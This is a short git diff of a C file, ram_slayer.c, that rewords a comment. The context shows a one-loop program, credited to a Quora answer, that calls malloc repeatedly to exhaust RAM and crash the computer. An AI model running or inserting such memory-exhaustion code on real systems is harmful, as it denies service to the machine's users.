diff --git a/ram_slayer.c b/ram_slayer.c index 1860dba..0ccebea 100644 --- a/ram_slayer.c +++ b/ram_slayer.c @@ -1,5 +1,5 @@ // Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/George-Gonzalez-5?srid=u2HNX -// Usees up all space of RAM. +// Consumes full space of the RAM. main(){ while(malloc(1000));